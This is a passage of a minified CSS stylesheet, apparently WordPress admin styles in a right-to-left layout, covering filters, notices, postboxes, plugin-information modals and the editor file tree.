0 1%;padding:20px 10px 10px;width:24%;background:#fff;border:1px solid #dcdcde;box-shadow:0 1px 1px rgba(0,0,0,.04)}.filter-group legend{position:absolute;top:10px;display:block;margin:0;padding:0;font-size:1em;font-weight:600}.filter-drawer .filter-group-feature{margin:28px 0 0;list-style-type:none;font-size:12px}.filter-drawer .filter-group-feature input,.filter-drawer .filter-group-feature label{line-height:1.4}.filter-drawer .filter-group-feature input{position:absolute;margin:0}.filter-group .filter-group-feature label{display:block;margin:14px 23px 14px 0}.filter-drawer .buttons{clear:both;margin-bottom:20px}.filter-drawer .filter-group+.buttons{margin-bottom:0;padding-top:20px}.filter-drawer .buttons .button span{display:inline-block;opacity:.8;font-size:12px;text-indent:10px}.wp-filter .button.clear-filters{display:none;margin-right:10px}.wp-filter .button-link.edit-filters{padding:0 5px;line-height:2.2}.filtered-by{display:none;margin:0}.filtered-by>span{font-weight:600}.filtered-by a{margin-right:10px}.filtered-by .tags{display:flex;align-items:flex-start;flex-wrap:wrap;gap:8px}.filtered-by .tag{padding:4px 8px;border:1px solid #dcdcde;box-shadow:0 1px 1px rgba(0,0,0,.04);background:#fff;font-size:11px}.filters-applied .filter-drawer .buttons,.filters-applied .filter-drawer br,.filters-applied .filter-group{display:none}.filters-applied .filtered-by{display:flex;align-items:center;flex-wrap:wrap;gap:10px}.filters-applied .filter-drawer{padding:20px}.error .content-filterable,.loading-content .content-filterable,.show-filters .content-filterable,.show-filters .favorites-form,.show-filters.filters-applied.loading-content .content-filterable{display:none}.show-filters.filters-applied .content-filterable{display:block}.loading-content .spinner{display:block;margin:40px auto 0;float:none}@media only screen and (max-width:1138px){.wp-filter .search-form{margin:11px 0}}@media only screen and (max-width:1250px){.wp-filter:has(.plugin-install-search) .search-form{margin:11px 0}}@media only screen and (max-width:1120px){.filter-drawer{border-bottom:1px solid #f0f0f1}.filter-group{margin-bottom:0;margin-top:5px;width:100%}.filter-group li{margin:10px 0}}@media only screen and (max-width:1000px){.filter-items{float:none}.wp-filter .media-toolbar-primary,.wp-filter .media-toolbar-secondary,.wp-filter .search-form{float:none;position:relative;max-width:100%}.wp-filter .search-form{margin:11px 0;flex-wrap:wrap;row-gap:10px}}@media only screen and (max-width:782px){.filter-group li{padding:0;width:50%}.wp-filter .search-form input[type=search]{min-height:40px;padding:0 12px}.wp-filter .filter-items select,.wp-filter .search-form select{min-height:40px;padding:0 12px 0 24px}}@media only screen and (max-width:320px){.filter-count{display:none}.wp-filter .drawer-toggle{margin:10px 0}.filter-group li,.wp-filter .search-form input[type=search]{width:100%}}.notice,div.error,div.updated{background:#fff;border:none;border-right:4px solid #c3c4c7;box-shadow:none;margin:5px 15px 2px;padding:8px 12px}div[class=update-message]{padding:.5em 0 .5em 12px}.form-table td .notice p,.notice p,.notice-title,div.error p,div.updated p{margin:.5em 0;padding:0;font-size:13px;line-height:1.54;color:#1e1e1e}div.error a,div.notice a,div.updated a{color:var(--wp-admin-theme-color-darker-10);text-decoration:underline}div.error a:hover,div.notice a:hover,div.updated a:hover{color:var(--wp-admin-theme-color-darker-20)}div.error a:focus,div.notice a:focus,div.updated a:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid transparent;border-radius:2px}.notice-alt{box-shadow:none}.notice-large{padding:10px 20px}.notice-title{display:inline-block;color:#1d2327;font-size:18px}.wp-core-ui .notice.is-dismissible{padding-left:48px;position:relative}.notice-dismiss{position:absolute;top:12px;left:12px;border:none;margin:0;padding:0;background:0 0;color:#1e1e1e;cursor:pointer;width:24px;height:24px;display:flex;align-items:center;justify-content:center;border-radius:2px}.notice-dismiss:active:before,.notice-dismiss:hover:before{color:#1e1e1e;opacity:.7}.notice-dismiss:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid transparent}.notice-dismiss:focus:before{color:#1e1e1e}.notice-success,div.updated{border-right-color:#4ab866;background-color:#eff9f1}.notice-success.notice-alt,div.updated.notice-alt{background-color:#eff9f1}.notice-warning{border-right-color:#f0b849;background-color:#fef8ee}.notice-warning.notice-alt{background-color:#fef8ee}.notice-error,div.error{border-right-color:#cc1818;background-color:#fcf0f0}.notice-error.notice-alt,div.error.notice-alt{background-color:#fcf0f0}.notice-info{border-right-color:#3858e9;background-color:#fff}.notice-info.notice-alt{background-color:#fff}#plugin-information-footer .update-now:not(.button-disabled):before{color:#d63638;content:"\f463";content:"\f463"/'';display:inline-block;font:normal 20px/1 dashicons;margin:-3px -2px 0 5px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:middle}#plugin-information-footer .notice{margin-top:-5px}.button.activated-message:before,.button.activating-message:before,.button.installed:before,.button.installing:before,.button.updated-message:before,.button.updating-message:before,.import-php .updating-message:before,.update-message p:before,.updated-message p:before,.updating-message p:before{display:inline-block;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:top}.media-upload-form .notice,.media-upload-form div.error,.wrap .notice,.wrap div.error,.wrap div.updated{margin:5px 0 15px}.wrap #templateside .notice{display:block;margin:0;padding:5px 8px;font-weight:600;text-decoration:none}.wrap #templateside span.notice{margin-right:-12px}#templateside li.notice a{padding:0}.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.update-message p:before,.updating-message p:before{color:#d63638;content:"\f463";content:"\f463"/''}.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.plugins .column-auto-updates .dashicons-update.spin,.theme-overlay .theme-autoupdate .dashicons-update.spin,.updating-message p:before{animation:rotation 2s infinite linear}@media (prefers-reduced-motion:reduce){.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.plugins .column-auto-updates .dashicons-update.spin,.theme-overlay .theme-autoupdate .dashicons-update.spin,.updating-message p:before{animation:none}}.theme-overlay .theme-autoupdate .dashicons-update.spin{margin-left:3px}.button.activated-message:before,.button.updated-message:before,.installed p:before,.updated-message p:before{color:#68de7c;content:"\f147";content:"\f147"/''}.update-message.notice-error p:before{color:#d63638;content:"\f534";content:"\f534"/''}.import-php .updating-message:before,.wrap .notice p:before{margin-left:6px}.import-php .updating-message:before{vertical-align:bottom}#update-nag,.update-nag{display:inline-block;line-height:1.4;padding:11px 15px;font-size:14px;margin:25px 2px 0 20px}ul#dismissed-updates{display:none}#dismissed-updates li>p{margin-top:0}#dismiss,#undismiss{margin-right:.5em}form.upgrade{margin-top:8px}form.upgrade .hint{font-style:italic;font-size:85%;margin:-.5em 0 2em}.update-php .spinner{float:none;margin:-4px 0}h2.wp-current-version{margin-bottom:.3em}p.update-last-checked{margin-top:0}p.auto-update-status{margin-top:2em;line-height:1.8}#ajax-loading,.ajax-feedback,.ajax-loading,.imgedit-wait-spin,.list-ajax-loading{visibility:hidden}#ajax-response.alignleft{margin-right:2em}.button.activated-message:before,.button.activating-message:before,.button.installed:before,.button.installing:before,.button.updated-message:before,.button.updating-message:before{margin:0 -2px 0 5px;line-height:1.9;vertical-align:top}#plugin-information-footer .button{padding:0 14px;line-height:2.71428571;font-size:14px;vertical-align:middle;min-height:40px;margin-bottom:4px}#plugin-information-footer .button.activated-message:before,#plugin-information-footer .button.activating-message:before,#plugin-information-footer .button.installed:before,#plugin-information-footer .button.installing:before,#plugin-information-footer .button.updated-message:before,#plugin-information-footer .button.updating-message:before{margin:0 -2px 0 5px;line-height:1.9;vertical-align:top}#plugin-information-footer .button.update-now.updating-message:before{margin:0 -2px 0 5px}.button-primary.activating-message:before,.button-primary.updating-message:before{color:#fff}.button-primary.activated-message:before,.button-primary.updated-message:before{color:#9ec2e6}.button.activated-message,.button.updated-message{transition-property:border,background,color;transition-duration:.05s;transition-timing-function:ease-in-out}#adminmenu a,#catlist a,#taglist a{text-decoration:none}#contextual-help-wrap,#screen-options-wrap{margin:0;padding:8px 20px 12px;position:relative}#contextual-help-wrap{overflow:auto;margin-right:0}#screen-meta-links{float:left;margin:0 0 0 20px}#screen-meta{display:none;margin:0 0 -1px 20px;position:relative;background-color:#fff;border:1px solid #c3c4c7;border-top:none;box-shadow:0 0 0 transparent}#contextual-help-link-wrap,#screen-options-link-wrap{float:right;margin:0 6px 0 0}#screen-meta-links .screen-meta-toggle{position:relative;top:0}#screen-meta-links .show-settings{border:1px solid #c3c4c7;border-top:none;height:auto;margin-bottom:0;padding:0 16px 0 6px;background:#fff;border-radius:0 0 4px 4px;color:#646970;box-shadow:0 0 0 transparent;transition:box-shadow .1s linear}#screen-meta-links .show-settings:active,#screen-meta-links .show-settings:focus,#screen-meta-links .show-settings:hover{color:#2c3338}#screen-meta-links .show-settings:focus{border-color:var(--wp-admin-theme-color,#3858e9);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#screen-meta-links .show-settings:active{transform:none}#screen-meta-links .show-settings:after{left:0;content:"\f140";content:"\f140"/'';font:normal 20px/1.5 dashicons;display:inline-block;padding:0 0 0 5px;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}#screen-meta-links .screen-meta-active:after{content:"\f142";content:"\f142"/''}.toggle-arrow{background-repeat:no-repeat;background-position:top right;background-color:transparent;height:22px;line-height:22px;display:block}.toggle-arrow-active{background-position:bottom right}#contextual-help-wrap h5,#screen-options-wrap h5,#screen-options-wrap legend{margin:0;padding:8px 0;font-size:13px;font-weight:600}.metabox-prefs label{display:inline-block;padding-left:15px;line-height:2.35}#number-of-columns{display:inline-block;vertical-align:middle;line-height:30px}.metabox-prefs input[type=checkbox]{margin-top:0;margin-left:6px}.metabox-prefs label input,.metabox-prefs label input[type=checkbox]{margin:-4px 0 0 5px}.metabox-prefs .columns-prefs label input{margin:-1px 0 0 2px}.metabox-prefs label a{display:none}.metabox-prefs .screen-options input,.metabox-prefs .screen-options label{margin-top:0;margin-bottom:0;vertical-align:middle}.metabox-prefs .screen-options .screen-per-page{margin-left:15px;padding-left:0}.metabox-prefs .screen-options label{line-height:2.2;padding-left:0}.screen-options+.screen-options{margin-top:10px}.metabox-prefs .submit{margin-top:1em;padding:0}#contextual-help-wrap{padding:0}#contextual-help-columns{position:relative}#contextual-help-back{position:absolute;top:0;bottom:0;right:150px;left:170px;border:1px solid #c3c4c7;border-top:none;border-bottom:none;background:rgba(var(--wp-admin-theme-color--rgb),.08)}#contextual-help-wrap.no-sidebar #contextual-help-back{left:0;border-left-width:0;border-bottom-left-radius:2px}.contextual-help-tabs{float:right;width:150px;margin:0}.contextual-help-tabs ul{margin:1em 0}.contextual-help-tabs li{margin-bottom:0;list-style-type:none;border-style:solid;border-width:0 2px 0 0;border-color:transparent}.contextual-help-tabs a{display:block;padding:5px 12px 5px 5px;line-height:1.4;text-decoration:none;border:1px solid transparent;border-left:none;border-right:none}.contextual-help-tabs a:hover{color:#2c3338}.contextual-help-tabs .active{padding:0;margin:0 0 0 -1px;border-right:2px solid var(--wp-admin-theme-color);background:color-mix(in srgb,var(--wp-admin-theme-color) 8%,#fff);box-shadow:0 2px 0 rgba(0,0,0,.02),0 1px 0 rgba(0,0,0,.02)}.contextual-help-tabs .active a{border-color:#c3c4c7;color:#2c3338}.contextual-help-tabs-wrap{padding:0 20px;overflow:auto}.help-tab-content{display:none;margin:0 0 12px 22px;line-height:1.6}.help-tab-content.active{display:block}.help-tab-content ul li{list-style-type:disc;margin-right:18px}.contextual-help-sidebar{width:150px;float:left;padding:0 12px 0 8px;overflow:auto}html.wp-toolbar{padding-top:var(--wp-admin--admin-bar--height);box-sizing:border-box;-ms-overflow-style:scrollbar}.widefat td,.widefat th{color:#50575e}.widefat tfoot td,.widefat th,.widefat thead td{font-weight:400}.widefat tfoot tr td,.widefat tfoot tr th,.widefat thead tr td,.widefat thead tr th{color:#2c3338}.widefat td p{margin:2px 0 .8em}.widefat ol,.widefat p,.widefat ul{color:#2c3338}.widefat .column-comment p{margin:.6em 0}.widefat .column-comment ul{list-style:initial;margin-right:2em}.postbox-container{float:right}.postbox-container .meta-box-sortables{box-sizing:border-box}#wpbody-content .metabox-holder{padding-top:10px}.metabox-holder .postbox-container .meta-box-sortables{min-height:1px;position:relative}#post-body-content{width:100%;min-width:463px;float:right}#post-body.columns-2 #postbox-container-1{float:left;margin-left:-300px;width:280px}#post-body.columns-2 #side-sortables{min-height:250px}@media only screen and (max-width:799px){#wpbody-content .metabox-holder .postbox-container .empty-container{outline:0;height:0;min-height:0}}.js .postbox .hndle,.js .widget .widget-top{cursor:move}.js .postbox .hndle.is-non-sortable,.js .widget .widget-top.is-non-sortable{cursor:auto}.hndle a{font-size:12px;font-weight:400}.postbox-header{display:flex;align-items:center;justify-content:space-between;border-bottom:1px solid #c3c4c7}.postbox-header .hndle{flex-grow:1;display:flex;justify-content:space-between;align-items:center}.postbox-header .handle-actions{flex-shrink:0}.postbox .handle-order-higher,.postbox .handle-order-lower,.postbox .handlediv{width:1.62rem;height:1.62rem;margin:0;padding:0;border:0;background:0 0;cursor:pointer}.postbox .handle-order-higher,.postbox .handle-order-lower{color:#646970;width:1.62rem}.edit-post-meta-boxes-area .postbox .handle-order-higher,.edit-post-meta-boxes-area .postbox .handle-order-lower{width:44px;height:44px;color:#1d2327}.postbox .handle-order-higher[aria-disabled=true],.postbox .handle-order-lower[aria-disabled=true]{cursor:default;color:#a7aaad}.sortable-placeholder:not(.empty-container .sortable-placeholder){border:1px dashed #c3c4c7;border-radius:8px;margin-bottom:20px}.postbox,.stuffbox{margin-bottom:20px;padding:0;line-height:1}.postbox.closed .postbox-header{border-bottom:0}.postbox .hndle,.stuffbox .hndle{-webkit-user-select:none;user-select:none}.postbox .inside{padding:0 12px 12px;line-height:1.4;font-size:13px}.stuffbox .inside{padding:0;line-height:1.4;font-size:13px;margin-top:0}.postbox .inside{margin:11px 0;position:relative}.postbox .inside>p:last-child,.rss-widget ul li:last-child{margin-bottom:1px!important}.postbox.closed h3{border:none;box-shadow:none}.postbox table.form-table{margin-bottom:0}.postbox table.widefat{box-shadow:none}.temp-border{border:1px dotted #c3c4c7}.columns-prefs label{padding:0 0 0 10px}#adminmenu .wp-submenu li.current,#adminmenu .wp-submenu li.current a,#adminmenu .wp-submenu li.current a:hover,#comment-status-display,#dashboard_right_now .versions .b,#ed_reply_toolbar #ed_reply_strong,#pass-strength-result.short,#pass-strength-result.strong,#post-status-display,#post-visibility-display,.feature-filter .feature-name,.item-controls .item-order a,.media-item .percent,.plugins .name{font-weight:600}#wpfooter{position:absolute;bottom:0;right:0;left:0;padding:10px 20px;color:#50575e}#wpfooter p{font-size:13px;margin:0;line-height:1.55}#footer-thankyou{font-style:italic}.nav-tab{float:right;border:1px solid #c3c4c7;border-bottom:none;margin-right:.5em;padding:5px 10px;font-size:14px;line-height:1.71428571;font-weight:600;background:#dcdcde;color:#50575e;text-decoration:none;white-space:nowrap}.nav-tab-small .nav-tab,h3 .nav-tab{padding:5px 14px;font-size:12px;line-height:1.33}.nav-tab:focus,.nav-tab:hover{background-color:#fff;color:#3c434a}.nav-tab-active,.nav-tab:focus:active{box-shadow:none}.nav-tab-active{margin-bottom:-1px;color:#3c434a}.nav-tab-active,.nav-tab-active:focus,.nav-tab-active:focus:active,.nav-tab-active:hover{border-bottom:1px solid #f0f0f1;background:#f0f0f1;color:#000}.nav-tab-wrapper,.wrap h2.nav-tab-wrapper,h1.nav-tab-wrapper{border-bottom:1px solid #c3c4c7;margin:0;padding-top:9px;padding-bottom:0;line-height:inherit}.nav-tab-wrapper:not(.wp-clearfix):after{content:"";display:table;clear:both}.spinner{background:url(../images/spinner.gif) no-repeat;background-size:20px 20px;display:inline-block;visibility:hidden;float:left;vertical-align:middle;opacity:.7;width:20px;height:20px;margin:10px 10px 0}.loading-content .spinner,.spinner.is-active{visibility:visible}#template>div{margin-left:16em}#template .notice{margin-top:1em;margin-left:3%}#template .notice p{width:auto}#template .submit .spinner{float:none;vertical-align:top}.metabox-holder .postbox>h3,.metabox-holder .stuffbox>h3,.metabox-holder h2.hndle,.metabox-holder h3.hndle{font-size:14px;padding:8px 12px;margin:0;line-height:1.4}.nav-menus-php .metabox-holder h3{padding:0}.accordion-container h3.accordion-section-title{padding:0!important}.accordion-section-title button.accordion-trigger,.nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger{background:inherit;color:#1d2327;display:block;position:relative;text-align:right;width:100%;outline:0;border:0;padding:10px 14px 11px 10px;line-height:1.5;cursor:pointer}.accordion-section-title button.accordion-trigger:focus,.nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.accordion-section-title span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down{position:absolute;left:10px;right:auto;color:#787c82;border-radius:50px;top:50%;transform:translateY(-50%)}.accordion-section-title:hover span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section-title:hover span.dashicons.dashicons-arrow-down{color:#1d2327}.accordion-section-title span.dashicons.dashicons-arrow-down::before,.nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down::before{position:relative;right:-1px}.accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down{transform:rotate(-180deg) translate(0,50%)}#templateside ul li a{text-decoration:none}.plugin-install #description,.plugin-install-network #description{width:60%}table .column-rating,table .column-visible,table .vers{text-align:right}.attention,.error-message{color:#d63638;font-weight:600}body.iframe{height:98%}.lp-show-latest p{display:none}.lp-show-latest .lp-error p,.lp-show-latest p:last-child{display:block}.media-icon{width:62px;text-align:center}.media-icon img{border:1px solid #dcdcde;border:1px solid rgba(0,0,0,.07)}#howto{font-size:11px;margin:0 5px;display:block}.importers{font-size:16px;width:auto}.importers td{padding-left:14px;line-height:1.4}.importers .import-system{max-width:250px}.importers td.desc{max-width:500px}.importer-action,.importer-desc,.importer-title{display:block}.importer-title{color:#000;font-size:14px;font-weight:400;margin-bottom:.2em}.importer-action{line-height:1.55;color:#50575e;margin-bottom:1em}#post-body #post-body-content #namediv h2,#post-body #post-body-content #namediv h3{margin-top:0}.edit-comment-author{color:#1d2327;border-bottom:1px solid #f0f0f1}#namediv h2 label,#namediv h3 label{vertical-align:baseline}#namediv table{width:100%}#namediv td.first{width:10px;white-space:nowrap}#namediv input{width:100%}#namediv p{margin:10px 0}.zerosize{height:0;width:0;margin:0;border:0;padding:0;overflow:hidden;position:absolute}br.clear{height:2px;line-height:.15}.checkbox{border:none;margin:0;padding:0}fieldset{border:0;padding:0;margin:0}.post-categories{display:inline;margin:0;padding:0}.post-categories li{display:inline}div.star-holder{position:relative;height:17px;width:100px;background:url(../images/stars.png?ver=20121108) repeat-x bottom right}div.star-holder .star-rating{background:url(../images/stars.png?ver=20121108) repeat-x top right;height:17px;float:right}.star-rating{white-space:nowrap}.star-rating .star{display:inline-block;width:20px;height:20px;-webkit-font-smoothing:antialiased;font-size:20px;line-height:1;font-family:dashicons;text-decoration:inherit;font-weight:400;font-style:normal;vertical-align:top;transition:color .1s ease-in;text-align:center;color:#dba617}.star-rating .star-full:before{content:"\f155";content:"\f155"/''}.star-rating .star-half:before{content:"\f459";content:"\f459"/''}.rtl .star-rating .star-half{transform:rotateY(-180deg)}.star-rating .star-empty:before{content:"\f154";content:"\f154"/''}div.action-links{font-weight:400;margin:6px 0 0}#plugin-information{background:#fff;position:fixed;top:0;left:0;bottom:0;right:0;height:100%;padding:0}#plugin-information-scrollable{overflow:auto;-webkit-overflow-scrolling:touch;height:100%}#plugin-information-title{padding:0 26px;background:#f6f7f7;font-size:22px;font-weight:600;line-height:2.4;position:relative;height:56px}#plugin-information-title.with-banner{margin-left:0;height:250px;background-size:cover}#plugin-information-title h2{font-size:1em;font-weight:600;padding:0;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}#plugin-information-title.with-banner h2{position:relative;font-family:"Helvetica Neue",sans-serif;display:inline-block;font-size:30px;line-height:1.68;box-sizing:border-box;max-width:100%;padding:0 15px;margin-top:174px;color:#fff;background:rgba(29,35,39,.9);text-shadow:0 1px 3px rgba(0,0,0,.4);box-shadow:0 0 30px rgba(255,255,255,.1);border-radius:8px}#plugin-information-title div.vignette{display:none}#plugin-information-title.with-banner div.vignette{position:absolute;display:block;top:0;right:0;height:250px;width:100%;background:0 0;box-shadow:inset 0 0 50px 4px rgba(0,0,0,.2),inset 0 -1px 0 rgba(0,0,0,.1)}#plugin-information-tabs{padding:0 16px;position:relative;left:0;right:0;min-height:36px;font-size:0;z-index:1;border-bottom:1px solid #dcdcde;background:#f6f7f7}#plugin-information-tabs a{position:relative;display:inline-block;padding:9px 10px;margin:0;height:18px;line-height:1.3;font-size:14px;text-decoration:none;transition:none}#plugin-information-tabs a.current{margin:0 -1px -1px;background:#fff;border:1px solid #dcdcde;border-bottom-color:#fff;padding-top:8px;color:#2c3338}#plugin-information-tabs.with-banner a.current{border-top:none;padding-top:9px}#plugin-information-tabs a:active,#plugin-information-tabs a:focus{outline:0}#plugin-information-content{overflow:hidden;background:#fff;position:relative;top:0;left:0;right:0;min-height:100%;min-height:calc(100% - 152px)}#plugin-information-content.with-banner{min-height:calc(100% - 346px)}#section-holder{position:relative;top:0;left:250px;bottom:0;right:0;margin-top:10px;margin-left:250px;padding:10px 26px 99999px;margin-bottom:-99932px}#section-holder .notice{margin:5px 0 15px}#section-holder .updated{margin:16px 0}#plugin-information .fyi{float:left;position:relative;top:0;left:0;padding:16px 16px 99999px;margin-bottom:-99932px;width:217px;border-right:1px solid #dcdcde;background:#f6f7f7;color:#646970}#plugin-information .fyi strong{color:#3c434a}#plugin-information .fyi h3{font-weight:600;text-transform:uppercase;font-size:12px;color:#646970;margin:24px 0 8px}#plugin-information .fyi h2{font-size:.9em;margin-bottom:0;margin-left:0}#plugin-information .fyi ul{padding:0;margin:0;list-style:none}#plugin-information .fyi li{margin:0 0 10px}#plugin-information .fyi-description{margin-top:0}#plugin-information .counter-container{margin:3px 0}#plugin-information .counter-label{float:right;margin-left:5px;min-width:55px}#plugin-information .counter-back{height:17px;width:92px;background-color:#dcdcde;float:right}#plugin-information .counter-bar{height:17px;background-color:#f0c33c;float:right}#plugin-information .counter-count{margin-right:5px}#plugin-information .fyi ul.contributors{margin-top:10px}#plugin-information .fyi ul.contributors li{display:inline-block;margin-left:8px;vertical-align:middle}#plugin-information .fyi ul.contributors li{display:inline-block;margin-left:8px;vertical-align:middle}#plugin-information .fyi ul.contributors li img{vertical-align:middle;margin-left:4px}#plugin-information-footer{padding:13px 16px;position:absolute;left:0;bottom:0;right:0;height:40px;border-top:1px solid #dcdcde;background:#f6f7f7}#plugin-information .section{direction:ltr}#plugin-information .section ol,#plugin-information .section ul{list-style-type:disc;margin-left:24px}#plugin-information .section,#plugin-information .section p{font-size:14px;line-height:1.7}#plugin-information #section-screenshots ol{list-style:none;margin:0}#plugin-information #section-screenshots li img{vertical-align:text-top;margin-top:16px;max-width:100%;width:auto;height:auto;box-shadow:0 1px 2px rgba(0,0,0,.3)}#plugin-information #section-screenshots li p{font-style:italic;padding-left:20px}#plugin-information pre{padding:7px;overflow:auto;border:1px solid #c3c4c7}#plugin-information blockquote{border-right:2px solid #dcdcde;color:#646970;font-style:italic;margin:1em 0;padding:0 1em 0 0}#plugin-information .review{overflow:hidden;width:100%;margin-bottom:20px;border-bottom:1px solid #dcdcde}#plugin-information .review-title-section{overflow:hidden}#plugin-information .review-title-section h4{display:inline-block;float:left;margin:0 6px 0 0}#plugin-information .reviewer-info p{clear:both;margin:0;padding-top:2px}#plugin-information .reviewer-info .avatar{float:left;margin:4px 6px 0 0}#plugin-information .reviewer-info .star-rating{float:left}#plugin-information .review-meta{float:left;margin-left:.75em}#plugin-information .review-body{float:left;width:100%}.plugin-version-author-uri{font-size:13px}.update-php .button.button-primary{margin-left:1em}@media screen and (max-width:771px){#plugin-information-title.with-banner{height:100px}#plugin-information-title.with-banner h2{margin-top:30px;font-size:20px;line-height:2;max-width:85%}#plugin-information-title.with-banner div.vignette{height:100px}#plugin-information-tabs{overflow:hidden;padding:0;height:auto}#plugin-information-tabs a.current{margin-bottom:0;border-bottom:none}#plugin-information .fyi{float:none;border:1px solid #dcdcde;position:static;width:auto;margin:26px 26px 0;padding-bottom:0}#section-holder{position:static;margin:0;padding-bottom:70px}#plugin-information .fyi h3,#plugin-information .fyi small{display:none}#plugin-information-footer{padding:12px 16px 0;height:46px}}#TB_window.plugin-details-modal{background:#fff}#TB_window.plugin-details-modal.thickbox-loading:before{content:"";display:block;width:20px;height:20px;position:absolute;right:50%;top:50%;z-index:-1;margin:-10px -10px 0 0;background:#fff url(../images/spinner.gif) no-repeat center;background-size:20px 20px;transform:translateZ(0)}@media print,(min-resolution:120dpi){#TB_window.plugin-details-modal.thickbox-loading:before{background-image:url(../images/spinner-2x.gif)}}.plugin-details-modal #TB_title{float:right;height:1px}.plugin-details-modal #TB_ajaxWindowTitle{display:none}.plugin-details-modal #TB_closeWindowButton{right:auto;left:-30px;color:#f0f0f1}.plugin-details-modal #TB_closeWindowButton:focus,.plugin-details-modal #TB_closeWindowButton:hover{outline:0;box-shadow:none}.plugin-details-modal #TB_closeWindowButton:focus::after,.plugin-details-modal #TB_closeWindowButton:hover::after{outline:2px solid;outline-offset:-4px;border-radius:4px}.plugin-details-modal .tb-close-icon{display:none}.plugin-details-modal #TB_closeWindowButton:after{content:"\f335";content:"\f335"/'';font:normal 32px/29px dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (max-width:830px){.plugin-details-modal #TB_closeWindowButton{left:0;top:-30px}}img{border:none}.bulk-action-notice .toggle-indicator::before,.meta-box-sortables .postbox .order-higher-indicator::before,.meta-box-sortables .postbox .order-lower-indicator::before,.meta-box-sortables .postbox .toggle-indicator::before,.privacy-text-box .toggle-indicator::before,.sidebar-name .toggle-indicator::before{content:"\f142";content:"\f142"/'';display:inline-block;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}.bulk-action-notice .bulk-action-errors-collapsed .toggle-indicator::before,.js .widgets-holder-wrap.closed .toggle-indicator::before,.meta-box-sortables .postbox.closed .handlediv .toggle-indicator::before,.privacy-text-box.closed .toggle-indicator::before{content:"\f140";content:"\f140"/''}.postbox .handle-order-higher .order-higher-indicator::before{content:"\f343";content:"\f343"/'';color:inherit}.postbox .handle-order-lower .order-lower-indicator::before{content:"\f347";content:"\f347"/'';color:inherit}.postbox .handle-order-higher .order-higher-indicator::before,.postbox .handle-order-lower .order-lower-indicator::before{position:relative;top:.11rem;width:20px;height:20px}.postbox .handlediv .toggle-indicator::before{width:20px;border-radius:50%}.postbox .handlediv .toggle-indicator::before{position:relative;top:.05rem;text-indent:-1px}.rtl .postbox .handlediv .toggle-indicator::before{text-indent:1px}.bulk-action-notice .toggle-indicator::before{line-height:16px;vertical-align:top;color:#787c82}.postbox .handle-order-higher:focus,.postbox .handle-order-lower:focus,.postbox .handlediv:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);border-radius:50%;outline:2px solid transparent}.postbox .handle-order-higher:focus .order-higher-indicator::before,.postbox .handle-order-lower:focus .order-lower-indicator::before,.postbox .handlediv:focus .toggle-indicator::before{box-shadow:none;outline:1px solid transparent}#photo-add-url-div input[type=text]{width:300px}.alignleft h2{margin:0}#template textarea{font-family:Consolas,Monaco,monospace;font-size:13px;background:#f6f7f7;tab-size:4}#template .CodeMirror,#template textarea{width:100%;min-height:60vh;height:calc(100vh - 295px);border:1px solid #dcdcde;box-sizing:border-box}#templateside>h2{padding-top:6px;padding-bottom:7px;margin:0}#templateside ol,#templateside ul{margin:0;padding:0}#templateside>ul{box-sizing:border-box;margin-top:0;overflow:auto;padding:0;min-height:60vh;height:calc(100vh - 295px);background-color:#f6f7f7;border:1px solid #dcdcde;border-right:none}#templateside ul ul{padding-right:12px}#templateside>ul>li>ul[role=group]{padding-right:0}[role=treeitem][aria-expanded=false]>ul{display:none}[role=treeitem] span[aria-hidden]{display:inline;font-family:dashicons;font-size:20px;position:absolute;pointer-events:none}[role=treeitem][aria-expanded=false]>.folder-label .icon:after{content:"\f141";content:"\f139"/''}[role=treeitem][aria-expanded=true]>.folder-label .icon:after{content:"\f140";content:"\f140"/''}[role=treeitem] .folder-label{display:block;padding:3px 12px 3px 3px;cursor:pointer}[role=treeitem]{outline:0}[role=treeitem] .folder-label.focus,[role=treeitem] a:focus{color:#043959;box-shadow:none;outline:2px solid var(--wp-admin-theme-color,#3858e9);outline-offset:-2px}[role=treeitem] .folder-label.hover,[role=treeitem].hover{background-color:#f0f0f1}.tree-folder{margin:0;position:relative}[role=treeitem] li{position:relative}.tree-folder .tree-folder::after{content:"";display:block;position:absolute;right:2px;border-right:1px solid #c3c4c7;top:-13px;bottom:10px}.tree-folder>li::before{content:"";position:absolute;display:block;border-right:1px solid #c3c4c7;right:2px;top:-5px;height:18px;width:7px;border-bottom:1px solid #c3c4c7}.tree-folder>li::after{content:"";position:absolute;display:block;border-right:1px solid #c3c4c7;right:2px;bottom:-7px;top:0}#templateside .current-file{margin:-4px 0 -2px}.tree-folder>.current-file::before{right:4px;height:15px;width:0;border-right:none;top:3px}.tree-folder>.current-file::after{bottom:-4px;height:7px;right:2px;top:auto}.tree-folder li:last-child>.tree-folder::after,.tree-folder>li:last-child::after{display:none}#documentation 